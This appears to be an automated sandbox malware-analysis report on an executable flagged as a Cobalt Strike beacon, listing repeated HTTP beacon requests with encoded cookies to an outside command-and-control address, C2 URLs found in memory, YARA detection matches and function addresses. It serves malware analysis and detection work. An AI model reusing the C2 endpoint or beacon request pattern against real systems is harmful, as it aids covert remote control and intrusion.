Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache

Source: 7xRIr23y7v.exe, 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A71000.00000004.00000020.00020000.00000000.sdmp, 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://139.196.73.80:9902/WNwA
Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://139.196.73.80:9902/WNwAf
Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2AB6000.00000004.00000020.00020000.00000000.sdmp, 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://139.196.73.80:9902/dpixel
Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://139.196.73.80:9902/dpixelp

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0083C720 SetWaitableTimer,SetWaitableTimer,NtWaitForSingleObject,		0_2_0083C720
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0083C6E0 NtWaitForSingleObject,		0_2_0083C6E0

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA730520 CreateProcessWithLogonW,GetLastError,

0_2_0000017DEA730520

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008268A0	0_2_008268A0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008120C0	0_2_008120C0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007F8880	0_2_007F8880
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007EB120	0_2_007EB120
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008159E0	0_2_008159E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00812920	0_2_00812920
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00837929	0_2_00837929
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007F51C0	0_2_007F51C0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00807AA0	0_2_00807AA0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008052E0	0_2_008052E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007E4200	0_2_007E4200
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007E4AE0	0_2_007E4AE0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007F0B00	0_2_007F0B00
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00801B00	0_2_00801B00
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007E83E0	0_2_007E83E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0081E480	0_2_0081E480
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007FB460	0_2_007FB460
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007FCC40	0_2_007FCC40
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007EBCE0	0_2_007EBCE0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0082CC60	0_2_0082CC60
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00827D80	0_2_00827D80
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007EFD60	0_2_007EFD60
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00817DA0	0_2_00817DA0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0081ADE0	0_2_0081ADE0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00819500	0_2_00819500
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007EA5E0	0_2_007EA5E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007F4DE0	0_2_007F4DE0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00823520	0_2_00823520
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0082E6A0	0_2_0082E6A0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007FF6E0	0_2_007FF6E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0080EF80	0_2_0080EF80
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007E4F60	0_2_007E4F60
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008067A0	0_2_008067A0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008027C0	0_2_008027C0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_008187E0	0_2_008187E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00805760	0_2_00805760
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_007F4780	0_2_007F4780
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA72D780	0_2_0000017DEA72D780
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA74745C	0_2_0000017DEA74745C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA736C98	0_2_0000017DEA736C98
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73ED3C	0_2_0000017DEA73ED3C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA729D6C	0_2_0000017DEA729D6C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA7301E8	0_2_0000017DEA7301E8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73E2C8	0_2_0000017DEA73E2C8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA7422B4	0_2_0000017DEA7422B4
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA7482B0	0_2_0000017DEA7482B0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA72A280	0_2_0000017DEA72A280
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73DB5C	0_2_0000017DEA73DB5C
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA749AF0	0_2_0000017DEA749AF0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73C148	0_2_0000017DEA73C148
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA74B100	0_2_0000017DEA74B100
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA7361A8	0_2_0000017DEA7361A8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA749180	0_2_0000017DEA749180
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA748E97	0_2_0000017DEA748E97
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73CF14	0_2_0000017DEA73CF14
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA33B58F	0_2_0000017DEA33B58F
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA32CBC7	0_2_0000017DEA32CBC7
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA33E183	0_2_0000017DEA33E183
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA33D70F	0_2_0000017DEA33D70F
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA33CFA3	0_2_0000017DEA33CFA3

